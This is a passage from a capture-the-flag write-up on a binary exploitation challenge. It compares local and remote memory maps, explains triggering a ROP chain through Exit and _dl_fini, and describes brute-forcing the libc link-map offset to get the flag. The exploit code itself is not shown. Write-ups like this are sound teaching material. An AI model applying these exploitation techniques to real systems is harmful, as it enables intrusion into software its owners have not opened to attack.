The lastly to get this to run, all you need to do is call Exit
so _dl_fini
can be called and viola a flag... on local at least
All the garbage will print out with it, as this is from our rop chain.
Remote
I'm going to ignore the fact that my rop chain wasn't working at one point when I first started trying to hit remote and talk about some of the real issues at hand, here are two memory maps, first is from my docker environment using the correct hash and the second is from the author from the remote system
0x00007eff8f7fa000 0x00007eff8f83d000 0x0000000000000000 rw- <-- mmapped region
0x00007eff8f83d000 0x00007eff8f869000 0x0000000000000000 r-- libc.so.6 <-- 0x43000 offset to mmapped region
0x00007eff8f869000 0x00007eff8f9fd000 0x000000000002c000 r-x libc.so.6
0x00007eff8f9fd000 0x00007eff8fa51000 0x00000000001c0000 r-- libc.so.6
0x00007eff8fa51000 0x00007eff8fa52000 0x0000000000214000 --- libc.so.6
0x00007eff8fa52000 0x00007eff8fa55000 0x0000000000214000 r-- libc.so.6
0x00007eff8fa55000 0x00007eff8fa58000 0x0000000000217000 rw- libc.so.6
0x00007eff8fa58000 0x00007eff8fa67000 0x0000000000000000 rw-
0x00007eff8fa69000 0x00007eff8fa6a000 0x0000000000000000 r-- ld-linux-x86-64.so.2 <-- 0x22c000 offset to LIBC
0x00007eff8fa6a000 0x00007eff8fa92000 0x0000000000001000 r-x ld-linux-x86-64.so.2
0x00007eff8fa92000 0x00007eff8fa9c000 0x0000000000029000 r-- ld-linux-x86-64.so.2
0x00007eff8fa9c000 0x00007eff8fa9e000 0x0000000000032000 r-- ld-linux-x86-64.so.2
0x00007eff8fa9e000 0x00007eff8faa0000 0x0000000000034000 rw- ld-linux-x86-64.so.2
7f54d09a4000-7f54d09e8000 rw-p 00000000 00:00 0 <-- mmapped region
7f54d09e8000-7f54d0a14000 r--p 00000000 00:2a7 9044063 libc.so.6 <-- 0x44000 offset to the heap
7f54d0a14000-7f54d0ba8000 r-xp 0002c000 00:2a7 9044063 libc.so.6
7f54d0ba8000-7f54d0bfc000 r--p 001c0000 00:2a7 9044063 libc.so.6
7f54d0bfc000-7f54d0bfd000 ---p 00214000 00:2a7 9044063 libc.so.6
7f54d0bfd000-7f54d0c00000 r--p 00214000 00:2a7 9044063 libc.so.6
7f54d0c00000-7f54d0c03000 rw-p 00217000 00:2a7 9044063 libc.so.6
7f54d0c03000-7f54d0c10000 rw-p 00000000 00:00 0
7f54d0c12000-7f54d0c14000 rw-p 00000000 00:00 0
7f54d0c14000-7f54d0c15000 r--p 00000000 00:2a7 9044044 ld-linux-x86-64.so.2 <-- 0x22c00 offset to LIBC
7f54d0c15000-7f54d0c3d000 r-xp 00001000 00:2a7 9044044 ld-linux-x86-64.so.2
7f54d0c3d000-7f54d0c47000 r--p 00029000 00:2a7 9044044 ld-linux-x86-64.so.2
7f54d0c47000-7f54d0c49000 r--p 00032000 00:2a7 9044044 ld-linux-x86-64.so.2
7f54d0c49000-7f54d0c4b000 rw-p 00034000 00:2a7 9044044 ld-linux-x86-64.so.2
After looking at this you would have the same assumption as me and everyone else that looked at it, all you need to do is add 0x1000 to all the offsets, let's see if that works.
run 0: started
run 0: flag not found
Well that is not reassuring, maybe I miss typed something so I checked, then double checked, then triple checked. Then asked someone else for confirmation on their system and their offsets were even more different. This is also where I learned about the puts error that I ran into. Thanks ath0 for this. So maybe a different gadget was running into the same issue of loading a different function because of CPU opperability, but after looking through, none of the gadgets should run into this. So I came to the assumption that one of my offsets had to still be different compared to my system, there is one offset that stands apart from everything else.
That would be the libc link map
, looking back our link map is at libc+0x228000
. Now this offset is a bit strange as it is almost to the ld and at the further edges of libc, it didn't truly occur to me that this is probably a loaded sub value as the remote system has two different mmapped chunks after libc and mine only has 1. To find the correct offset, you guessed it we brute force, I set a quick brute to jump every 8 bytes starting at the 0x22a000 from libc, and got a hit at 0x200. Now giving me the flag!!!
Takeaway
This challenge took the most of my time in a long time for a CTF challenge, I'm happy that I was able to successfully complete the challenge but a bit dissappointed that I wasn't able to claim the blood because of different system offsets, not even libc/ld. Before you think, "why not just check their system and try it"... I did, I ran my exploit for there other challenge, interview, and checked the kernel version thinking this would work. Found the rare instance, then tried it on 3 different ubuntu versions, all had different offsets then the remote. So I reached out to the infra man, and was informed that:
theyre running the ubuntu-gke-2004-1-21-v20211104 gcp image
kernel is 5.4.0-1054-gke
At this point I thought I spent enough time trying to get this working and pretty much threw in the towel as it was already past the deadline. So it was a great surprise when my last gamble actually paid off while I was writing this writeup.
Anyways, thanks for reading and thanks to pepsipu for the challenge, ath0 for the sanity check and help, and sour for sitting in discord and watching me fail for hours when you didn't fully understand what was going on!